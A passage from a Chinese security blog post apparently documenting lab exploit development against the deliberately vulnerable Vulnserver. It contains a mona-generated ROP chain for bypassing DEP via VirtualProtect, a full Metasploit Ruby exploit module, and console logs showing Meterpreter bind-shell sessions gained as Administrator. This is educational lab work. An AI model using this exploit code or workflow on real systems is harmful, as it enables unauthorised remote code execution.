<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">msf5 > use exploit/windows/yanhan/seh_attack</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) > set rhosts 192.168.31.114</span><br><span class="line">rhosts => 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) > set rport 80</span><br><span class="line">rport => 80</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) > exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) > set payload windows/meterpreter/bind_tcp</span><br><span class="line">payload => windows/meterpreter/bind_tcp</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) > exploit</span><br><span class="line"></span><br><span class="line">[*] Started bind TCP handler against 192.168.31.114:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:46601 -> 192.168.31.114:4444) at 2019-07-10 16:43:47 +0800</span><br><span class="line"></span><br><span class="line">meterpreter > getuid</span><br><span class="line">Server username: WHU-3E3EECEBFD1\Administrator</span><br></pre></td></tr></table></figure>
</li>
</ol>
<hr>
<h1 id="0x03-绕过DEP"><a href="#0x03-绕过DEP" class="headerlink" title="0x03 绕过DEP"></a>0x03 绕过DEP</h1><blockquote>
<p><strong>目标程序</strong> <a href="http://www.thegreycorner.com/2010/12/introducing-vulnserver.html" target="_blank" rel="noopener">Introducing Vulnserver</a><br><strong>使用</strong> vulnserver.exe 6666<br><strong>漏洞点</strong> <img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744461/%E5%9B%BE%E7%89%8712.png" alt></p>
</blockquote>
<h2 id="设置DEP保护"><a href="#设置DEP保护" class="headerlink" title="设置DEP保护"></a>设置DEP保护</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744518/pwn/%E6%8D%9511%E8%8E%B7.png" alt><br><em>构建ROP链来调用VirtualProtect()关闭DEP并执行Shellcode</em></p>
<h2 id="计算偏移量"><a href="#计算偏移量" class="headerlink" title="计算偏移量"></a>计算偏移量</h2><p><code>'TRUN .'+make_nops(target['Offset'])</code><br>Immunity附加进程之后,在服务端发送3000个字符,计算偏移</p>
<h2 id="创建ROP链"><a href="#创建ROP链" class="headerlink" title="创建ROP链"></a>创建ROP链</h2><p><code>!mona rop -m *.dll -cp nonull</code><br><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">################################################################################</span></span><br><span class="line"></span><br><span class="line">Register setup <span class="keyword">for</span> VirtualProtect() <span class="symbol">:</span></span><br><span class="line">--------------------------------------------</span><br><span class="line"> EAX = NOP (<span class="number">0x90909090</span>)</span><br><span class="line"> ECX = lpOldProtect (ptr to W address)</span><br><span class="line"> EDX = NewProtect (<span class="number">0x40</span>)</span><br><span class="line"> EBX = dwSize</span><br><span class="line"> ESP = lPAddress (automatic)</span><br><span class="line"> EBP = ReturnTo (ptr to jmp esp)</span><br><span class="line"> ESI = ptr to VirtualProtect()</span><br><span class="line"> EDI = ROP NOP (RETN)</span><br><span class="line"> --- alternative chain ---</span><br><span class="line"> EAX = ptr to &VirtualProtect()</span><br><span class="line"> ECX = lpOldProtect (ptr to W address)</span><br><span class="line"> EDX = NewProtect (<span class="number">0x40</span>)</span><br><span class="line"> EBX = dwSize</span><br><span class="line"> ESP = lPAddress (automatic)</span><br><span class="line"> EBP = POP (skip <span class="number">4</span> bytes)</span><br><span class="line"> ESI = ptr to JMP [EAX]</span><br><span class="line"> EDI = ROP NOP (RETN)</span><br><span class="line"> + place ptr to <span class="string">"jmp esp"</span> on stack, below PUSHAD</span><br><span class="line">--------------------------------------------</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ROP Chain <span class="keyword">for</span> VirtualProtect() [(XP/<span class="number">2003</span> Server <span class="keyword">and</span> up)] <span class="symbol">:</span></span><br><span class="line">----------------------------------------------------------</span><br><span class="line"></span><br><span class="line">*** [ Ruby ] ***</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span></span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line"> rop_gadgets =</span><br><span class="line"> [</span><br><span class="line"> <span class="number">0x77dabf34</span>, <span class="comment"># POP ECX # RETN [ADVAPI32.dll]</span></span><br><span class="line"> <span class="number">0x6250609c</span>, <span class="comment"># ptr to &VirtualProtect() [IAT essfunc.dll]</span></span><br><span class="line"> <span class="number">0x77d1927f</span>, <span class="comment"># MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll]</span></span><br><span class="line"> <span class="number">0x7c96d192</span>, <span class="comment"># XCHG EAX,ESI # RETN [ntdll.dll]</span></span><br><span class="line"> <span class="number">0x77bef671</span>, <span class="comment"># POP EBP # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x625011af</span>, <span class="comment"># & jmp esp [essfunc.dll]</span></span><br><span class="line"> <span class="number">0x77e9ad22</span>, <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0xfffffdff</span>, <span class="comment"># Value to negate, will become 0x00000201</span></span><br><span class="line"> <span class="number">0x77e6c784</span>, <span class="comment"># NEG EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x77dc560a</span>, <span class="comment"># XCHG EAX,EBX # RETN [ADVAPI32.dll]</span></span><br><span class="line"> <span class="number">0x7c87fbcb</span>, <span class="comment"># POP EAX # RETN [kernel32.dll]</span></span><br><span class="line"> <span class="number">0xffffffc0</span>, <span class="comment"># Value to negate, will become 0x00000040</span></span><br><span class="line"> <span class="number">0x77d4493b</span>, <span class="comment"># NEG EAX # RETN [USER32.dll]</span></span><br><span class="line"> <span class="number">0x77c28fbc</span>, <span class="comment"># XCHG EAX,EDX # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x77bef7c9</span>, <span class="comment"># POP ECX # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x7c99bac1</span>, <span class="comment"># &Writable location [ntdll.dll]</span></span><br><span class="line"> <span class="number">0x719e4870</span>, <span class="comment"># POP EDI # RETN [mswsock.dll]</span></span><br><span class="line"> <span class="number">0x77e6d224</span>, <span class="comment"># RETN (ROP NOP) [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x77e8c50c</span>, <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x90909090</span>, <span class="comment"># nop</span></span><br><span class="line"> <span class="number">0x77de60c7</span>, <span class="comment"># PUSHAD # RETN [ADVAPI32.dll]</span></span><br><span class="line"> ].flatten.pack(<span class="string">"V*"</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> rop_gadgets</span><br><span class="line"></span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Call the ROP chain generator inside the 'exploit' function :</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> rop_chain = create_rop_chain()</span><br></pre></td></tr></table></figure></p>
<h2 id="自动化攻击-2"><a href="#自动化攻击-2" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Metasploit3</span> < Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line"> Rank = NormalRanking</span><br><span class="line"> <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = {})</span></span></span><br><span class="line"> <span class="keyword">super</span>(update_info(info,</span><br><span class="line"> <span class="string">'Name'</span> => <span class="string">'DEP Bypass Exploit'</span>,</span><br><span class="line"> <span class="string">'Description'</span> => <span class="string">%q{</span></span><br><span class="line"><span class="string"> DEP Bypass Using ROP Chains Example Module</span></span><br><span class="line"><span class="string"> }</span>,</span><br><span class="line"> <span class="string">'Platform'</span> => <span class="string">'Windows'</span>,</span><br><span class="line"> <span class="string">'Author'</span> => <span class="string">'yanhan'</span>,</span><br><span class="line"> <span class="string">'Payload'</span> =></span><br><span class="line"> {</span><br><span class="line"> <span class="string">'space'</span> => <span class="number">312</span>,</span><br><span class="line"> <span class="string">'BadChars'</span> => <span class="string">"\x00"</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">'Targets'</span> =></span><br><span class="line"> [</span><br><span class="line"> [</span><br><span class="line"> <span class="string">'Windows XP'</span>,</span><br><span class="line"> {<span class="string">'Offset'</span> => find it}</span><br><span class="line"> ]</span><br><span class="line"> ],</span><br><span class="line"> <span class="string">'DisclosureDate'</span> => <span class="string">'2019-01-16'</span>))</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span></span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line"> rop_gadgets =</span><br><span class="line"> [</span><br><span class="line"> <span class="number">0x77dabf34</span>, <span class="comment"># POP ECX # RETN [ADVAPI32.dll]</span></span><br><span class="line"> <span class="number">0x6250609c</span>, <span class="comment"># ptr to &VirtualProtect() [IAT essfunc.dll]</span></span><br><span class="line"> <span class="number">0x77d1927f</span>, <span class="comment"># MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll]</span></span><br><span class="line"> <span class="number">0x7c96d192</span>, <span class="comment"># XCHG EAX,ESI # RETN [ntdll.dll]</span></span><br><span class="line"> <span class="number">0x77bef671</span>, <span class="comment"># POP EBP # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x625011af</span>, <span class="comment"># & jmp esp [essfunc.dll]</span></span><br><span class="line"> <span class="number">0x77e9ad22</span>, <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0xfffffdff</span>, <span class="comment"># Value to negate, will become 0x00000201</span></span><br><span class="line"> <span class="number">0x77e6c784</span>, <span class="comment"># NEG EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x77dc560a</span>, <span class="comment"># XCHG EAX,EBX # RETN [ADVAPI32.dll]</span></span><br><span class="line"> <span class="number">0x7c87fbcb</span>, <span class="comment"># POP EAX # RETN [kernel32.dll]</span></span><br><span class="line"> <span class="number">0xffffffc0</span>, <span class="comment"># Value to negate, will become 0x00000040</span></span><br><span class="line"> <span class="number">0x77d4493b</span>, <span class="comment"># NEG EAX # RETN [USER32.dll]</span></span><br><span class="line"> <span class="number">0x77c28fbc</span>, <span class="comment"># XCHG EAX,EDX # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x77bef7c9</span>, <span class="comment"># POP ECX # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x7c99bac1</span>, <span class="comment"># &Writable location [ntdll.dll]</span></span><br><span class="line"> <span class="number">0x719e4870</span>, <span class="comment"># POP EDI # RETN [mswsock.dll]</span></span><br><span class="line"> <span class="number">0x77e6d224</span>, <span class="comment"># RETN (ROP NOP) [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x77e8c50c</span>, <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x90909090</span>, <span class="comment"># nop</span></span><br><span class="line"> <span class="number">0x77de60c7</span>, <span class="comment"># PUSHAD # RETN [ADVAPI32.dll]</span></span><br><span class="line"> ].flatten.pack(<span class="string">"V*"</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> rop_gadgets</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line"> connect</span><br><span class="line"> rop_chain = create_rop_chain()</span><br><span class="line"> junk = make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line"> buf = <span class="string">"TRUN ."</span> + junk + rop_chain + make_nops(<span class="number">16</span>) + payload.encoded + <span class="string">'\r\n'</span></span><br><span class="line"> sock.put(buf)</span><br><span class="line"> handler</span><br><span class="line"> disconnect</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">msf5 > use exploit/windows/yanhan/rop_attack</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) > set rhosts 192.168.31.114</span><br><span class="line">rhosts => 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) > set rport 1000</span><br><span class="line">rport => 1000</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) > exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) > set payload windows/meterpreter/bind_tcp</span><br><span class="line">payload => windows/meterpreter/bind_tcp</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) > exploit</span><br><span class="line"></span><br><span class="line">[*] Started bind TCP handler against 192.168.31.114:4444</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) > exploit</span><br><span class="line"></span><br><span class="line">[*] Started bind TCP handler against 192.168.31.114:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:44537 -> 192.168.31.114:4444) at 2019-07-10 16:51:07 +0800</span><br><span class="line"></span><br><span class="line">meterpreter > getuid</span><br><span class="line">Server username: WHU-3E3EECEBFD1\Administrator</span><br></pre></td></tr></table></figure>
</div>
<div>
<div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
<div>您的支持将鼓励我继续创作!</div>
<button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
<span>打赏</span>
</button>
<div id="QR" style="display: none;">
<div id="wechat" style="display: inline-block">
<img id="wechat_qr" src="/images/Wechatpay.png" alt="Cool-Y 微信支付">
<p>微信支付</p>
</div>
<div id="alipay" style="display: inline-block">
<img id="alipay_qr" src="/images/Alipay.png" alt="Cool-Y 支付宝">
<p>支付宝</p>
</div>
</div>
</div>
</div>
<div>
<ul class="post-copyright">
<li class="post-copyright-author">
<strong>本文作者:</strong>
Cool-Y
</li>
<li class="post-copyright-link">
<strong>本文链接:</strong>
<a href="https://cool-y.github.io/2019/07/10/x86basic/" title="x86-basic 漏洞利用">https://cool-y.github.io/2019/07/10/x86basic/</a>
</li>
<li class="post-copyright-license">
<strong>版权声明: </strong>
本博客所有文章除特别声明外,均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处!
</li>
</ul>
</div>
<footer class="post-footer">
<div class="post-tags">
<a href="/tags/二进制/" rel="tag"># 二进制</a>
<a href="/tags/Windows/" rel="tag"># Windows</a>
<a href="/tags/漏洞/" rel="tag"># 漏洞</a>
</div>
<div class="post-nav">
<div class="post-nav-next post-nav-item">
<a href="/2019/07/09/afl-first-try/" rel="next" title="AFL-爱之初体验">
<i class="fa fa-chevron-left"></i> AFL-爱之初体验
</a>
</div>
<span class="post-nav-divider"></span>
<div class="post-nav-prev post-nav-item">
<a href="/2019/07/16/linux-pwn-32/" rel="prev" title="Linux Pwn-缓冲区溢出利用">
Linux Pwn-缓冲区溢出利用 <i class="fa fa-chevron-right"></i>
</a>
</div>
</div>
</footer>
</div>
</article>
<div class="post-spread">
</div>
</div>
</div>
</div>
<div class="sidebar-toggle">
<div class="sidebar-toggle-line-wrap">
<span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
<span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
<span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
</div>
</div>
<aside id="sidebar" class="sidebar">
<div class="sidebar-inner">
<ul class="sidebar-nav motion-element">
<li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
文章目录
</li>
<li class="sidebar-nav-overview" data-target="site-overview-wrap">
站点概览
</li>
</ul>
<section class="site-overview-wrap sidebar-panel">
<div class="site-overview">
<div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
<img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Cool-Y">
<p class="site-author-name" itemprop="name">Cool-Y</p>
<p class="site-description motion-element" itemprop="description">没人比我更懂中医#MAGA</p>
</div>
<nav class="site-state motion-element">
<div class="site-state-item site-state-posts">
<a href="/archives/">
<span class="site-state-item-count">30</span>
<span class="site-state-item-name">日志</span>
</a>
</div>
<div class="site-state-item site-state-categories">
<a href="/categories/index.html">
<span class="site-state-item-count">7</span>
<span class="site-state-item-name">分类</span>
</a>
</div>
<div class="site-state-item site-state-tags">
<a href="/tags/index.html">
<span class="site-state-item-count">55</span>
<span class="site-state-item-name">标签</span>
</a>
</div>
</nav>
<div class="links-of-author motion-element">
<span class="links-of-author-item">
<a href="https://github.com/Cool-Y" target="_blank" title="GitHub">
<i class="fa fa-fw fa-github"></i>GitHub</a>
</span>
<span class="links-of-author-item">
<a href="mailto:cool.yim@whu.edu.cn" target="_blank" title="E-Mail">
<i class="fa fa-fw fa-envelope"></i>E-Mail</a>
</span>
<span class="links-of-author-item">
<a href="https://www.instagram.com/yan__han/" target="_blank" title="Instagram">
<i class="fa fa-fw fa-instagram"></i>Instagram</a>
</span>
</div>
<div id="music163player">
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="330" height="110" src="//music.163.com/outchain/player?type=4&id=334277093&auto=1&height=90"></iframe>
</div>
</div>
</section>
<!--noindex-->
<section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
<div class="post-toc">
<div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-漏洞利用开发简介"><span class="nav-text">0x00 漏洞利用开发简介</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-简单栈溢出"><span class="nav-text">0x01 简单栈溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞点"><span class="nav-text">漏洞点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#关闭防御措施"><span class="nav-text">关闭防御措施</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#整体的攻击流程"><span class="nav-text">整体的攻击流程</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#确定溢出点的位置"><span class="nav-text">确定溢出点的位置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#寻找jmp-esp跳板"><span class="nav-text">寻找jmp esp跳板</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击"><span class="nav-text">自动化攻击</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-基于SEH的栈溢出"><span class="nav-text">0x02 基于SEH的栈溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#确定溢出点的位置-1"><span class="nav-text">确定溢出点的位置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#寻找PPR"><span class="nav-text">寻找PPR</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击-1"><span class="nav-text">自动化攻击</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-绕过DEP"><span class="nav-text">0x03 绕过DEP</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#设置DEP保护"><span class="nav-text">设置DEP保护</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#计算偏移量"><span class="nav-text">计算偏移量</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#创建ROP链"><span class="nav-text">创建ROP链</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击-2"><span class="nav-text">自动化攻击</span></a></li></ol></li></ol></div>
</div>
</section>
<!--/noindex-->
</div>
</aside>
</div>
</main>
<footer id="footer" class="footer">
<div class="footer-inner">
<div class="copyright">© 2019 — <span itemprop="copyrightYear">2021</span>
<span class="with-love">
<i class="fa fa-user"></i>
</span>
<span class="author" itemprop="copyrightHolder">Cool-Y</span>
<span class="post-meta-divider">|</span>
<span class="post-meta-item-icon">
<i class="fa fa-area-chart"></i>
</span>
<span title="Site words total count">105.4k</span>
</div>
<div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>
<div class="busuanzi-count">
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span class="site-uv">
<i class="fa fa-user"></i>
<span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
</span>
<span class="site-pv">
<i class="fa fa-eye"></i>
<span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
</span>
</div>
</div>
</footer>
<div class="back-to-top">
<i class="fa fa-arrow-up"></i>
</div>
</div>
<script type="text/javascript">
if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
window.Promise = null;
}
</script>
<script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
<script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
<script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
<script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
<script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
<script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>
<script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
<script>AV.initialize("EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz", "x8FxDrYG79C8YFrTww9ljo8K");</script>
<script>
function showTime(Counter) {
var query = new AV.Query(Counter);
var entries = [];
var $visitors = $(".leancloud_visitors");
$visitors.each(function () {
entries.push( $(this).attr("id").trim() );
});
query.containedIn('url', entries);
query.find()
.done(function (results) {
var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
if (results.length === 0) {
$visitors.find(COUNT_CONTAINER_REF).text(0);
return;
}
for (var i = 0; i < results.length; i++) {
var item = results[i];
var url = item.get('url');
var time = item.get('time');
var element = document.getElementById(url);
$(element).find(COUNT_CONTAINER_REF).text(time);
}
for(var i = 0; i < entries.length; i++) {
var url = entries[i];
var element = document.getElementById(url);
var countSpan = $(element).find(COUNT_CONTAINER_REF);
if( countSpan.text() == '') {
countSpan.text(0);
}
}
})
.fail(function (object, error) {
console.log("Error: " + error.code + " " + error.message);
});
}
function addCount(Counter) {
var $visitors = $(".leancloud_visitors");
var url = $visitors.attr('id').trim();
var title = $visitors.attr('data-flag-title').trim();
var query = new AV.Query(Counter);
query.equalTo("url", url);
query.find({
success: function(results) {
if (results.length > 0) {
var counter = results[0];
counter.fetchWhenSave(true);
counter.increment("time");
counter.save(null, {
success: function(counter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(counter.get('time'));
},
error: function(counter, error) {
console.log('Failed to save Visitor num, with error message: ' + error.message);
}
});
} else {
var newcounter = new Counter();
/* Set ACL */
var acl = new AV.ACL();
acl.setPublicReadAccess(true);
acl.setPublicWriteAccess(true);
newcounter.setACL(acl);
/* End Set ACL */
newcounter.set("title", title);
newcounter.set("url", url);
newcounter.set("time", 1);
newcounter.save(null, {
success: function(newcounter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(newcounter.get('time'));
},
error: function(newcounter, error) {
console.log('Failed to create');
}
});
}
},
error: function(error) {
console.log('Error:' + error.code + " " + error.message);
}
});
}
$(function() {
var Counter = AV.Object.extend("Counter");
if ($('.leancloud_visitors').length == 1) {
addCount(Counter);
} else if ($('.post-title-link').length > 1) {
showTime(Counter);
}
});
</script>
<script>
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
})();
</script>
</body>
</html>